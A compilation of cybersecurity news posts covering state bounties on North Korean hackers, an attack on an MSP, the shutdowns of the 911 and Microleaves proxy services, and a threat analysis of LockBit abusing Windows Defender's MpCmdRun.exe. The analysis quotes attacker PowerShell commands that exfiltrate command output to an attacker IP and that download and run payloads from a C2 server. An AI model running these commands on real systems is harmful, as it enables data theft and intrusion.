The Good, the Bad, and the Ugly in Cybersecurity – Week 31

The Good

The U.S. State Department is offering up to $10 million to people who offer tips that help law enforcement investigate and disrupt state-sponsored threat actor groups.

This week, the State Department’s official Rewards for Justice Twitter account announced an increase in reward money offered to people who come forward with information on members or individuals affiliated with state-sponsored threat groups. The tweet specifically called out Andariel, APT38, Bluenoroff, Guardians of Peace, Kimsuky, and Lazarus Group, as well as any groups that “are involved in targeting critical U.S. infrastructure in violation of the Computer Fraud and Abuse Act.”

These increases reflect the U.S. government’s growing scrutiny on state-sponsored threat actors in North Korea, which have previously attacked cryptocurrency exchanges, financial institutions, and most recently healthcare organizations. The State Department first issued a $5 million bounty for information that would disrupt North Korean cyber criminal activities in April 2020, before issuing another call to action in March of 2022, when DPRK-sponsored threat actors launched a series of attacks to fund the North Korean government’s operations.

In light of other successful operations to disrupt international cyber criminals, it’s encouraging to see the U.S. government turn its attention to such notorious threat actors.

The Bad

On Tuesday, NetStandard, a Kansas-based MSP, suffered a cyber attack which forced the company to shut down its cloud-based services.

In an email to its customers, NetStandard disclosed that they had detected signs of a cyber attack in the environment for its MyAppsAnywhere cloud services, which include Hosted GP, Hosted CRM, Hosted Exchange, and Hosted SharePoint services.

Although the email also assured MyAppsAnywhere customers that none of NetStandard’s other services were impacted at the time of publication, NetStandard’s website was temporarily shut down following the incident. After they initially detected signs of an attack, the NetStandard team shut down their MyAppsAnywhere services, created an active incident bridge to stop attackers from causing more damage, and immediately contacted their insurance provider to find a third-party cybersecurity firm to provide remediation support and restore NetStandard’s services.

Since the initial disclosure, NetStandard has not provided public-facing updates to non-customers about the outages. However, security researchers believe that NetStandard was likely hit by ransomware, since ransomware operators like the REvil ransomware gang have previously threatened MSPs for their client base. By compromising the MSP’s clients, threat actors can extort multiple targets and increase the amount of money they gain and damage they can cause.

MSPs play a valuable role in keeping small and medium-sized businesses up and running, and it’s incredibly unfortunate that threat actors are targeting providers like NetStandard to reach a large number of smaller businesses. As the U.S. government continues to warn MSPs that they are at risk, we encourage MSPs to adopt recommended best practices to secure their environments and their customer data.

The Ugly

A private sector offensive actor (PSOA) has uncovered and used multiple Windows zero-day exploits in targeted cyber attacks.

In a recent report, researchers from Microsoft’s MSTIC identified the actor behind a cluster of threat activity it tracks as ‘KNOTWEED’ as being DSIRF, an Austria-based surveillance outfit that made the news for developing and selling Subzero, a malware toolkit that targets phones, computers and other internet-connected devices.

DSIRF, the report says, deployed Subzero in attacks targeting Microsoft customers in Europe and Central America, including banks, law firms, and strategic consultancies. In particular, DSIRF exploited CVE-2021-31199 and CVE-2021-31201, two Windows privilege escalation exploits, prior to their being patched in 2021. A third Windows privilege escalation vulnerability, later patched as CVE-2021-36948, was also used to drop Subzero malware. The researchers found that attack chain involved a malicious DLL signed by ‘DSIRF GmbH’.

Unlike other private sector offensive actors, DSIRF appear to run both access-as-a-service and hack-for-hire operations. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the PSOA, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that DSIRF may blend these models.

The private sector offensive actor space has been a cause of concern for some time now, with this just the latest of multiple cases coming to light of their involvement in areas that go far beyond their stated remit of aiding and abetting law enforcement agencies in pursuit of terrorist or criminal enterprises. Attacks on civil rights campaigners, dissidents, journalists and legitimate political opponents are increasingly being supported or undertaken by PSOA products or personnel.

911 Proxy Service Implodes After Disclosing Breach

The 911 service as it existed until July 28, 2022.

911[.]re, a proxy service that since 2015 has sold access to hundreds of thousands of Microsoft Windows computers daily, announced this week that it is shutting down in the wake of a data breach that destroyed key components of its business operations. The abrupt closure comes ten days after KrebsOnSecurity published an in-depth look at 911 and its connections to shady pay-per-install affiliate programs that secretly bundled 911’s proxy software with other titles, including “free” utilities and pirated software.

911[.]re is was one of the original “residential proxy” networks, which allow someone to rent a residential IP address to use as a relay for his/her Internet communications, providing anonymity and the advantage of being perceived as a residential user surfing the web.

Residential proxy services are often marketed to people seeking the ability to evade country-specific blocking by the major movie and media streaming providers. But some of them — like 911 — build their networks in part by offering “free VPN” or “free proxy” services that are powered by software which turns the user’s PC into a traffic relay for other users. In this scenario, users indeed get to use a free VPN service, but they are often unaware that doing so will turn their computer into a proxy that lets others use their Internet address to transact online.

From a website’s perspective, the IP traffic of a residential proxy network user appears to originate from the rented residential IP address, not from the proxy service customer. These services can be used in a legitimate manner for several business purposes — such as price comparisons or sales intelligence — but they are massively abused for hiding cybercrime activity because they can make it difficult to trace malicious traffic to its original source.

As noted in KrebsOnSecurity’s July 19 story on 911, the proxy service operated multiple pay-per-install schemes that paid affiliates to surreptitiously bundle the proxy software with other software, continuously generating a steady stream of new proxies for the service.

A cached copy of flashupdate[.]net circa 2016, which shows it was the homepage of a pay-per-install affiliate program that incentivized the silent installation of 911’s proxy software.

Within hours of that story, 911 posted a notice at the top of its site, saying, “We are reviewing our network and adding a series of security measures to prevent misuse of our services. Proxy balance top-up and new user registration are closed. We are reviewing every existing user, to ensure their usage is legit and [in] compliance with our Terms of Service.”

At this announcement, all hell broke loose on various cybercrime forums, where many longtime 911 customers reported they were unable to use the service. Others affected by the outage said it seemed 911 was trying to implement some sort of “know your customer” rules — that maybe 911 was just trying to weed out those customers using the service for high volumes of cybercriminal activity.

Then on July 28, the 911 website began redirecting to a notice saying, “We regret to inform you that we permanently shut down 911 and all its services on July 28th.”

According to 911, the service was hacked in early July, and it was discovered that someone manipulated the balances of a large number of user accounts. 911 said the intruders abused an application programming interface (API) that handles the topping up of accounts when users make financial deposits with the service.

“Not sure how did the hacker get in,” the 911 message reads. “Therefore, we urgently shut down the recharge system, new user registration, and an investigation started.”

The parting message from 911 to its users, posted to the homepage July 28, 2022.

However the intruders got in, 911 said, they managed to also overwrite critical 911[.]re servers, data and backups of that data.

“On July 28th, a large number of users reported that they could not log in the system,” the statement continues. “We found that the data on the server was maliciously damaged by the hacker, resulting in the loss of data and backups. Its [sic] confirmed that the recharge system was also hacked the same way. We were forced to make this difficult decision due to the loss of important data that made the service unrecoverable.”

Operated largely out of China, 911 was an enormously popular service across many cybercrime forums, and it became something akin to critical infrastructure for this community after two of 911’s longtime competitors — malware-based proxy services VIP72 and LuxSocksclosed their doors in the past year.

Now, many on the crime forums who relied on 911 for their operations are wondering aloud whether there are any alternatives that match the scale and utility that 911 offered. The consensus seems to be a resounding “no.”

I’m guessing we may soon learn more about the security incidents that caused 911 to implode. And perhaps other proxy services will spring up to meet what appears to be a burgeoning demand for such services at the moment, with comparatively little supply.

In the meantime, 911’s absence may coincide with a measurable (if only short-lived) reprieve in unwanted traffic to top Internet destinations, including banks, retailers and cryptocurrency platforms, as many former customers of the proxy service scramble to make alternative arrangements.

Riley Kilmer, co-founder of the proxy-tracking service Spur.us, said 911’s network will be difficult to replicate in the short run.

“My speculation is [911’s remaining competitors] are going to get a major boost in the short term, but a new player will eventually come along,” Kilmer said. “None of those are good replacements for LuxSocks or 911. However, they will all allow anyone to use them. For fraud rates, the attempts will continue but through these replacement services which should be easier to monitor and stop. 911 had some very clean IP addresses.”

911 wasn’t the only major proxy provider disclosing a breach this week tied to unauthenticated APIs: On July 28, KrebsOnSecurity reported that internal APIs exposed to the web had leaked the customer database for Microleaves, a proxy service that rotates its customers’ IP addresses every five to ten minutes. That investigation showed Microleaves — like 911 — had a long history of using pay-per-install schemes to spread its proxy software.

Living Off Windows Defender | LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool

LockBit has been receiving a fair share of attention recently. Last week, SentinelLabs reported on LockBit 3.0 (aka LockBit Black), describing how the latest iteration of this increasingly prevalent RaaS implemented a series of anti-analysis and anti-debugging routines. Our research was quickly followed up by others reporting similar findings. Meanwhile, back in April, SentinelLabs reported on how a LockBit affiliate was leveraging the legitimate VMware command line utility, VMwareXferlogs.exe, in a live engagement to side load Cobalt Strike.

In this post, we follow up on that incident by describing the use of another legitimate tool used to similar effect by a LockBit operator or affiliate, only this time the tool in question turns out to belong to a security tool: Windows Defender. During a recent investigation, we found that threat actors were abusing the Windows Defender command line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.

Overview

The initial target compromise happened via the Log4j vulnerability against an unpatched VMWare Horizon Server. The attackers modified the Blast Secure Gateway component of the application installing a web shell using PowerShell code found documented here.

Once initial access had been achieved, the threat actors performed a series of enumeration commands and attempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire and a new way to side-load Cobalt Strike.

In particular, when attempting to execute Cobalt Strike we observed a new legitimate tool used for side-loading a malicious DLL, that decrypts the payload.

Previously observed techniques to evade defenses by removing EDR/EPP’s userland hooks, Event Tracing for Windows and Antimalware Scan Interface were also observed.

Attack Chain

Once the attackers gained initial access via the Log4j vulnerability, reconnaissance began using PowerShell to execute commands and exfiltrate the command output via a POST base64 encoded request to an IP. Examples of the reconnaissance activity can be seen below:

powershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((whoami)))))powershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((nltest /domain_trusts)))))

Once the threat actor acquired sufficient privileges, they attempted to download and execute multiple post-exploitation payloads.

The threat actor downloads a malicious DLL, the encrypted payload and the legitimate tool from their controlled C2:

powershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/mpclient.dll -OutFile c:windowshelpwindowsmpclient.dll;Invoke-WebRequest -uri http://45.32.108[.]54:443/c0000015.log -OutFile c:windowshelpwindowsc0000015.log;Invoke-WebRequest -uri http://45.32.108[.]54:443/MpCmdRun.exe -OutFile c:windowshelpwindowsMpCmdRun.exe;c:windowshelpwindowsMpCmdRun.exe

Notably, the threat actor leverages the legitimate Windows Defender command line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.

We also note the correlation between the IP address used to download the Cobalt Strike payload and the IP address used to perform reconnaissance: shortly after downloading Cobalt Strike the threat actor tried to execute and send the output to the IP starting with 139, as can be seen in both snippets below.

powershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/glib-2.0.dll -OutFile c:userspublicglib-2.0.dll;Invoke-WebRequest -uri http://45.32.108[.]54:443/c0000013.log -OutFile c:userspublicc0000013.log;Invoke-WebRequest -uri http://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile c:userspublicVMwareXferlogs.exe;c:userspublicVMwareXferlogs.exe
powershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((c:userspublicVMwareXferlogs.exe)))))

Following the same flow as the sideloading of the VMwareXferlogs.exe utility reported on previously, MpCmd.exe is abused to side-load a weaponized mpclient.dll, which loads and decrypts Cobalt Strike Beacon from the c0000015.log file.

As such, the components used in the attack specifically related to the use of the Windows Defender command line tool are:

Filename Description
mpclient.dll Weaponized DLL loaded by MpCmdRun.exe
MpCmdRun.exe Legitimate/signed Microsoft Defender utility
C0000015.log Encrypted Cobalt Strike payload

Conclusion

Defenders need to be alert to the fact that LockBit ransomware operators and affiliates are exploring and exploiting novel “living off the land” tools to aid them in loading Cobalt Strike beacons and evading some common EDR and traditional AV detection tools.

Importantly, tools that should receive careful scrutiny are any that either the organization or the organization’s security software have made exceptions for. Products like VMware and Windows Defender have a high prevalence in the enterprise and a high utility to threat actors if they are allowed to operate outside of the installed security controls.

Indicators of Compromise

IoC Description
a512215a000d1b21f92dbef5d8d57a420197d262 Malicious glib-2.0.dll
729eb505c36c08860c4408db7be85d707bdcbf1b Malicious glib-2.0.dll
c05216f896b289b9b426e249eae8a091a3358182 Malicious glib-2.0.dll
10039d5e5ee5710a067c58e76cd8200451e54b55 Malicious glib-2.0.dll
ff01473073c5460d1e544f5b17cd25dadf9da513 Malicious glib-2.0.dll
e35a702db47cb11337f523933acd3bce2f60346d Encrypted Cobalt Strike payload – c0000015.log
82bd4273fa76f20d51ca514e1070a3369a89313b Encrypted Cobalt Strike payload – c0000015.log
091b490500b5f827cc8cde41c9a7f68174d11302 Decrypted Cobalt Strike payload – c0000015.log
0815277e12d206c5bbb18fd1ade99bf225ede5db Encrypted Cobalt Strike payload – c0000013.log
eed31d16d3673199b34b48fb74278df8ec15ae33 Malicious mpclient.dll
149.28.137[.]7 Cobalt Strike C2
45.32.108[.]54 IP where the attacker staged the malicious payloads to be downloaded
139.180.184[.]147 Attacker C2 used to receive data from executed commands
info.openjdklab[.]xyz Domain used by the mpclient.dll

Breach Exposes Users of Microleaves Proxy Service

Microleaves, a ten-year-old proxy service that lets customers route their web traffic through millions of Microsoft Windows computers, recently fixed a vulnerability in their website that exposed their entire user database. Microleaves claims its proxy software is installed with user consent, but data exposed in the breach shows the service has a lengthy history of being supplied with new proxies by affiliates incentivized to distribute the software any which way they can — such as by secretly bundling it with other titles.

The Microleaves proxy service, which is in the process of being rebranded to Shifter[.[io.

Launched in 2013, Microleaves is a service that allows customers to route their Internet traffic through PCs in virtually any country or city around the globe. Microleaves works by changing each customer’s Internet Protocol (IP) address every five to ten minutes.

The service, which accepts PayPal, Bitcoin and all major credit cards, is aimed primarily at enterprises engaged in repetitive, automated activity that often results in an IP address being temporarily blocked — such as data scraping, or mass-creating new accounts at some service online.

In response to a report about the data exposure from KrebsOnSecurity, Microleaves said it was grateful for being notified about a “very serious issue regarding our customer information.”

Abhishek Gupta is the PR and marketing manager for Microleaves, which he said in the process of being rebranded to “Shifter.io.” Gupta said the report qualified as a “medium” severity security issue in Shifter’s brand new bug bounty program (the site makes no mention of a bug bounty), which he said offers up to $2,000 for reporting data exposure issues like the one they just fixed. KrebsOnSecurity declined the offer and requested that Shifter donate the amount to the Electronic Frontier Foundation (EFF), a digital rights group.

From its inception nearly a decade ago, Microleaves has claimed to lease between 20-30 million IPs via its service at any time. Riley Kilmer, co-founder of the proxy-tracking service Spur.us, said that 20-30 million number might be accurate for Shifter if measured across a six-month time frame. Currently, Spur is tracking roughly a quarter-million proxies associated with Microleaves/Shifter each day, with a high rate of churn in IPs.

Early on, this rather large volume of IP addresses led many to speculate that Microleaves was just a botnet which was being resold as a commercial proxy service.

Proxy traffic related to top Microleaves users, as exposed by the website’s API.

The very first discussion thread started by the new user Microleaves on the forum BlackHatWorld in 2013 sought forum members who could help test and grow the proxy network. At the time, the Microleaves user said their proxy network had 150,000 IPs globally, and was growing quickly.

One of BlackHatWorld’s moderators asked the administrator of the forum to review the Microleaves post.

“User states has 150k proxies,” the forum skeptic wrote. “No seller on BHW has 150k working daily proxies none of us do. Which hints at a possible BOTNET. That’s the only way you will get 150k.”

Microleaves has long been classified by antivirus companies as adware or as a “potentially unwanted program” (PUP), the euphemism that antivirus companies use to describe executable files that get installed with ambiguous consent at best, and are often part of a bundle of software tied to some “free” download. Security vendor Kaspersky flags the Microleaves family of software as a trojan horse program that commandeers the user’s Internet connection as a proxy without notifying the user.

“While working, these Trojans pose as Microsoft Windows Update,” Kaspersky wrote.

In a February 2014 post to BlackHatWorld, Microleaves announced that its sister service — reverseproxies[.]com — was now offering an “Auto CAPTCHA Solving Service,” which automates the solving of those squiggly and sometimes frustrating puzzles that many websites use to distinguish bots from real visitors. The CAPTCHA service was offered as an add-on to the Microleaves proxy service, and ranged in price from $20 for a 2-day trial to $320 for solving up to 80 captchas simultaneously.

“We break normal Recaptcha with 60-90% success rate, recaptcha with blobs 30% success, and 500+ other captcha,” Microleaves wrote. “As you know all success rate on recaptcha depends very much on good proxies that are fresh and not spammed!”

WHO IS ACIDUT?

The exposed Microleaves user database shows that the first user created on the service — username “admin” — used the email address alex.iulian@aol.com. A search on that email address in Constella Intelligence, a service that tracks breached data, reveals it was used to create an account at the link shortening service bit.ly under the name Alexandru Florea, and the username “Acidut.” [Full disclosure: Constella is currently an advertiser on this website].

According to the cyber intelligence company Intel 471, a user named Acidut with the email address iulyan87_4u@gmail.com had an active presence on almost a dozen shadowy money-making and cybercrime forums from 2010 to 2017, including BlackHatWorld, Carder[.]pro, Hackforums, OpenSC, and CPAElites.

The user Microleaves (later “Shifter.io”) advertised on BlackHatWorld the sale of 31 million residential IPs for use as proxies, in late 2013. The same account continues to sell subscriptions to Shifter.io.

In a 2011 post on Hackforums, Acidut said they were building a botnet using an “exploit kit,” a set of browser exploits made to be stitched into hacked websites and foist malware on visitors. Acidut claimed their exploit kit was generating 3,000 to 5,000 new bots each day. OpenSC was hacked at one point, and its private messages show Acidut purchased a license from Exmanoize, the handle used by the creator of the Eleonore Exploit Kit.

By November 2013, Acidut was advertising the sale of “26 million SOCKS residential proxies.” In a March 2016 post to CPAElites, Acidut said they had a worthwhile offer for people involved in pay-per-install or “PPI” schemes, which match criminal gangs who pay for malware installs with enterprising hackers looking to sell access to compromised PCs and websites.

Because pay-per-install affiliate schemes rarely impose restrictions on how the software can be installed, such programs can be appealing for cybercriminals who already control large collections of hacked machines and/or compromised websites. Indeed, Acidut went a step further, adding that their program could be quietly and invisibly nested inside of other programs.

“For those of you who are doing PPI I have a global offer that you can bundle to your installer,” Acidut wrote. “I am looking for many installs for an app that will generate website visits. The installer has a silence version which you can use inside your installer. I am looking to buy as many daily installs as possible worldwide, except China.”

Asked about the source of their proxies in 2014, the Microleaves user responded that it was “something related to a PPI network. I can’t say more and I won’t get into details.”

Acidut authored a similar message on the forum BlackHatWorld in 2013, where they encouraged users to contact them on Skype at the username “nevo.julian.” That same Skype contact address was listed prominently on the Microleaves homepage up until about a week ago when KrebsOnSecurity first reached out to the company.

ONLINE[.]IO (NOW MERCIFULLY OFFLINE)

There is a Facebook profile for an Alexandru Iulian Florea from Constanta, Romania, whose username on the social media network is Acidut. Prior to KrebsOnSecurity alerting Shifter of its data breach, the Acidut profile page associated Florea with the websites microleaves.com, shrooms.io, leftclick[.]io, and online[.]io. Mr. Florea did not respond to multiple requests for comment, and his Facebook page no longer mentions these domains.

Leftclick and online[.]io emerged as subsidiaries of Microleaves between 2017 and 2018. According to a help wanted ad posted in 2018 for a developer position at online[.]io, the company’s services were brazenly pitched to investors as “a cybersecurity and privacy tool kit, offering extensive protection using advanced adblocking, anti-tracking systems, malware protection, and revolutionary VPN access based on residential IPs.”

A teaser from Irish Tech News.

“Online[.]io is developing the first fully decentralized peer-to-peer networking technology and revolutionizing the browsing experience by making it faster, ad free, more reliable, secure and non-trackable, thus freeing the Internet from annoying ads, malware, and trackers,” reads the rest of that help wanted ad.

Microleaves CEO Alexandru Florea gave an “interview” to the website Irishtechnews.ie in 2018, in which he explained how Online[.]io (OIO) was going to upend the online advertising and security industries with its initial coin offering (ICO). The word interview is in air quotes because the following statements by Florea deserved some serious pushback by the interviewer.

“Online[.]io solution, developed using the Ethereum blockchain, aims at disrupting the digital advertising market valued at more than $1 trillion USD,” Alexandru enthused. “By staking OIO tokens and implementing our solution, the website operators will be able to access a new non-invasive revenue stream, which capitalizes on time spent by users online.”

“At the same time, internet users who stake OIO tokens will have the opportunity to monetize on the time spent online by themselves and their peers on the World Wide Web,” he continued. “The time spent by users online will lead to ICE tokens being mined, which in turn can be used in the dedicated merchant system or traded on exchanges and consequently changed to fiat.”

Translation: If you install our proxy bot/CAPTCHA-solver/ad software on your computer — or as an exploit kit on your website — we’ll make millions hijacking ads and you will be rewarded with heaps of soon-to-be-worthless shitcoin. Oh, and all your security woes will disappear, too.

It’s unclear how many Internet users and websites willingly agreed to get bombarded with Online[.]io’s annoying ads and search hijackers — and to have their PC turned into a proxy or CAPTCHA-solving zombie for others. But that is exactly what multiple security companies said happened when users encountered online[.]io, which operated using the Microsoft Windows process name of “online-guardian.exe.”

Incredibly, Crunchbase says Online[.]io raised $6 million in funding for an initial coin offering in 2018, based on the plainly ludicrous claims made above. Since then, however, online[.]io seems to have gone…offline, for good.

SUPER TECH VENTURES?

Until this week, Shifter.io’s website also exposed information about its customer base and most active users, as well as how much money each client has paid over the lifetime of their subscription. The data indicates Shifter has earned more than $11.7 million in direct payments, although it’s unclear how far back in time those payment records go, or how complete they are.

The bulk of Shifter customers who spent more than $100,000 at the proxy service appear to be digital advertising companies, including some located in the United States. None of the several Shifter customers approached by KrebsOnSecurity agreed to be interviewed.

Shifter’s Gupta said he’d been with the company for three years, since the new owner took over the company and made the rebrand to Shifter.

“The company has been on the market for a long time, but operated under a different brand called Microleaves, until new ownership and management took over the company started a reorganization process that is still on-going,” Gupta said. “We are fully transparent. Mostly [our customers] work in the data scraping niche, this is why we actually developed more products in this zone and made a big shift towards APIs and integrated solutions in the past year.”

Ah yes, the same APIs and integrated solutions that were found exposed to the Internet and leaking all of Shifter’s customer information.

Gupta said the original founder of Microleaves was a man from India, who later sold the business to Florea. According to Gupta, the Romanian entrepreneur had multiple issues in trying to run the company, and then sold it three years ago to the current owner — Super Tech Ventures, a private equity company based in Taiwan.

“Our CEO is Wang Wei, he has been with the company since 3 years ago,” Gupta said. “Mr. Florea left the company two years ago after ending this transition period.”

Google and other search engines seem to know nothing about a Super Tech Ventures based in Taiwan. Incredibly, Shifter’s own PR person claimed that he, too, was in the dark on this subject.

“I would love to help, but I really don’t know much about the mother company,” Gupta said, essentially walking back his “fully transparent” statement. “I know they are a branch of the bigger group of asian investment firms focused on private equity in multiple industries.”

Adware and proxy software are often bundled together with “free” software utilities online, or with popular software titles that have been pirated and quietly fused with installers tied to various PPI affiliate schemes.

But just as often, these intrusive programs will include some type of notice — even if installed as part of a software bundle — that many users simply do not read and click “Next” to get on with installing whatever software they’re seeking to use. In these cases, selecting the “basic” or “default” settings while installing usually hides any per-program installation prompts, and assumes you agree to all of the bundled programs being installed. It’s always best to opt for the “custom” installation mode, which can give you a better idea of what is actually being installed, and can let you control certain aspects of the installation.

Either way, it’s best to start with the assumption that if a software or service online is “free,” that there is likely some component involved that allows the provider of that service to monetize your activity. As KrebsOnSecurity noted at the conclusion of last week’s story on a China-based proxy service called 911, the rule of thumb for transacting online is that if you’re not the paying customer, then you and/or your devices are probably the product that’s being sold to others.

Further reading on proxy services:

July 18, 2022: A Deep Dive Into the Residential Proxy Service ‘911’
June 28, 2022: The Link Between AWM Proxy & the Glupteba Botnet
June 22, 2022: Meet the Administrators of the RSOCKS Proxy Botnet
Sept. 1, 2021: 15-Year-Old Malware Proxy Network VIP72 Goes Dark
Aug. 19, 2019: The Rise of “Bulletproof” Residential Networks

How to Modernize Vulnerability Management in Today’s Evolving Threat Landscape

Looking at Gartner’s top trend in Cybersecurity 2022 report, it is not surprising that the attack surface expansion is ranked as their highest priority. The ever-expanding digital footprint of modern organizations continually exposes software vulnerabilities and presents threat actors with an expanding attack surface. The larger the target, the harder it is to miss.

Meanwhile, many organizations continue to rely on traditional vulnerability management solutions, risk assessments, and a lengthy list of patches and security control changes that they must apply manually. The fact that this isn’t working is evidenced by statistics such as that nearly 70% of organizations remain vulnerable to WannaCry, and over 80% of organizations believe they are vulnerable to breaches due to misconfigurations.

This post explores how today’s threat landscape has evolved, putting unbearable pressure on security teams struggling with current vulnerability management practices. We then explore some best practices for vulnerability management and discuss how AI paired with human ingenuity can help modernize vulnerability management.

Why a New Approach to Vulnerability Management Is Needed

The amount of reported and exploitable vulnerabilities continues to increase. In Q1 2022, 8,000 new vulnerabilities were confirmed. Looking across all reported vulnerabilities in CVE Details, 11% have a critical score. Furthermore, Edgescan’s 2022 Vulnerability Statistics Report confirmed that one-in-ten vulnerabilities in internet-facing applications are considered a high or critical risk.

With many organizations today leveraging cloud services, there has also been a lot of focus by both the research community and threat actors on identifying cloud vulnerabilities. When examining all the reported vulnerabilities, it is clear that Microsoft products account for many of the reported vulnerabilities rated as critical. Many of these cloud vulnerabilities depend on the Cloud Service Provider (CSP) for resolution.

Looking across software and cloud vulnerabilities, it is clear that as an industry, we have a large attack surface, and therefore, in such a cybersecurity climate, it is not surprising that the threat landscape continues to evolve rapidly. According to IBM, the average breach lifecycle takes 287 days. Today, most malware is polymorphic, meaning its identifiable features constantly change to evade traditional defense mechanisms. Cybercriminals increasingly leverage “living off the land” (LotL) techniques that allow them to use the operating system’s or user’s binaries for malicious activities.

Furthermore, with many modern applications and cloud services not configured with security in mind, threat actors increasingly target service misconfigurations to break into an environment. In such a rapidly evolving threat landscape, many existing security tools and processes can no longer scale and provide sufficient coverage for an organization.

In light of the increase of discovered vulnerabilities, the evolving sophistication of the threat landscape, and the exponential growth of the digital estate, we require a new approach to how organizations manage vulnerability assessment and mitigation.

What’s Wrong With Vulnerability Management Today?

Historically, many organizations relied on traditional Threat and Vulnerability Management (TVM) solutions and professional services to perform in-time scans of an environment to identify possible vulnerabilities and misconfigurations, and then the security team would need to act on the often lengthy list of required mitigations manually. At least, this is the theory on how organizations should be handling vulnerabilities.

In practice, however, many of the identified required mitigations like pending operating system or application patches or adjustment of security controls would not be applied due to a lack of resources or complexity of the required change, and therefore a couple of months later, when the security team did another assessment, they would find similar remediation recommendations.

It is alarming that today many security consultants confirm that after six to twelve months, they could almost put up the same risk report when they visit the same organization for another risk assessment because the organization did not implement the required changes. This is not only shocking from a security perspective but also from a financial and risk perspective. Essentially, many organizations regularly pay for risk assessments, but their overall risk level isn’t improving.

With all that in mind, organizations are often barely able to focus on patching critical vulnerabilities in their operating systems and don’t have the resources to focus on anything beyond that, leaving a significant attack surface open for cybercriminals in their identity, application, and cloud infrastructure.

Looking at today’s challenges and limitations with vulnerability management programs, as defenders, we require a new approach to managing risks from vulnerabilities across our digital estate. An approach that allows human operators to focus and prioritize while Artificial Intelligence provides real-time asset discovery, vulnerability detection, risk assessment, and automatic remediation of cyber risks.

Vulnerability Management Best Practices

1. Conduct Real-Time Surface Discovery

Unmanaged assets like endpoints, mobile devices, IoT devices, and Software-as-a-Service (SaaS) applications are a significant risk to organizations. Research by DoControl identified that up to 40% of SaaS data access is unmanaged. As such, for an organization to identify its entire attack surface, it is paramount to start with being able to locate all its assets, to begin with. Simply speaking, you can’t protect what you don’t know exists. To aid this effort, modern vulnerability management solutions combine asset discovery capabilities by leveraging managed assets as beacons to discover unmanaged assets in an environment.

2. Use Continuous Vulnerability Assessment

With the sheer volume of vulnerabilities, the traditional approach of bringing in a 3rd-party consultant for a periodic risk assessment has become obsolete. Today, technology can be leveraged to perform continuous and real-time vulnerability detection and analysis. Modern vulnerability management solutions do that by leveraging cloud processing power and Artificial Intelligence (AI) to simulate often what traditional periodic and manual risk assessments would do in real-time. These solutions start with continuously scanning all assets based on vendor and industry best practices like CIS benchmarks. Essentially, the solution is validating the current state against configuration baselines and best practices.

3. Understand Your Risk and Exposure

Not all vulnerabilities are equally important. Let’s start by understanding the different types of vulnerabilities:

  • Unpatched Software: Unpatched software, regardless of whether we talk about the operating system or user applications, is often the first thing that comes to mind when looking into vulnerability management. Cybercriminals can use these unpatched vulnerabilities to break into an environment or steal sensitive data.
  • Weak Authorization: Cybercriminals leverage weak authorization protocols and weak password policies to brute force into an environment. That is why things like adopting modern authentication methods, Conditional Access, and Multi-Factor-Authentication (MFA) are critical.
  • Misconfiguration: Regardless of whether we talk about the operating system, user applications, or cloud services, all can be exposed due to misconfigurations. The 2022 Cloud Security Report from Check Point confirms that 27% of organizations experienced a security incident in their public cloud infrastructure, while 23% of those were caused due to cloud misconfigurations.
  • Zero-Day Vulnerabilities: A zero-day vulnerability is a vulnerability in a system that has been recently discovered, but the vendor is yet to provide mitigation for it. When new Zero-day vulnerabilities are discovered, we often see an increase in large-scale campaigns by threat actors. Examples are global campaigns like WannaCry, NotPetya, Kaseya, or SolarWinds.

Now that we understand what vulnerabilities are, let’s look into the difference between vulnerabilities versus exploits:

  • Vulnerability: A vulnerability is an unexpected design flaw that, in theory, could be exploited.
  • Exploit: An exploit is a series of activities someone performs that exploits a vulnerability to perform unwanted and unauthorized actions.

In the context of risk and exposure management, it is therefore essential to understand an organization’s vulnerability and how it can be exploited. This will help determine the priority on how fast an organization should respond to a newly discovered vulnerability in their environment. This is precisely why traditional vulnerability management solutions fail, as they often miss the link between the vulnerability and the exploit.

That is why modern vulnerability management solutions are converging into Extended Detection Response (XDR) platforms, as it allows the vendor to provide an organization with real-time risk and exposure assessments by correlating identified vulnerabilities with telemetry coming from their Identity Threat Detection Response (ITDR) and Endpoint Detection Response (EDR) capabilities.

4. Leverage Security Posture Management

Naturally, after identifying the risk and exposure to vulnerabilities, the next step is determining how an organization can reduce the exposed risk. In this case, organizations are essentially looking to understand how they can remediate the issue.

To achieve this, we need to correlate the confirmed issue and the current configuration state of the impacted asset. This will allow the organization to find the best path forward.

That is why modern vulnerability management solutions leverage security posture management capabilities. They will enable them to compare the current state versus best practices and provide the organization with descriptive remediation recommendations.

5. Adopt Automatic Work Prioritization

While the previous step is focused on automatically identifying the remediation requirements, the step of automatic work prioritization helps provide the bigger picture.

In the end, there will always be vulnerabilities, and there will always be things we need to do to reduce the attack surface; therefore, we need to prioritize the work by clearly understanding the exposed risk.

Technology can help to identify vulnerabilities, provide remediation recommendations, and to some extent, automatically prioritize work based on possible impact; however, security teams know their environment best and play a vital role in prioritizing required work based on their deep knowledge of their environment.

6. Use Pilot Groups To Test Remediation

One of the biggest challenges in vulnerability management is often remediation. The reason is that many recommended activities are supposed to target the entire digital estate directly, even though some of the remediation steps could fundamentally change their enterprise architecture. As such, organizations are often concerned about making these changes due to the fear of breaking existing functioning business processes and systems, possibly increasing help desk support volume. Therefore, it is recommended that for most vulnerabilities, the remediation activity is targeted first to defined pilot groups before rolling it out across the fleet.

7. Implement Automatic Remediation

Once the IT and security team is confident with the implemented remediation in a pilot group, it is time to roll out the remediation across the digital estate gradually. At this point, the risk of breaking functioning business processes and systems should be minimal.

Artificial Intelligence Paired With Human Ingenuity

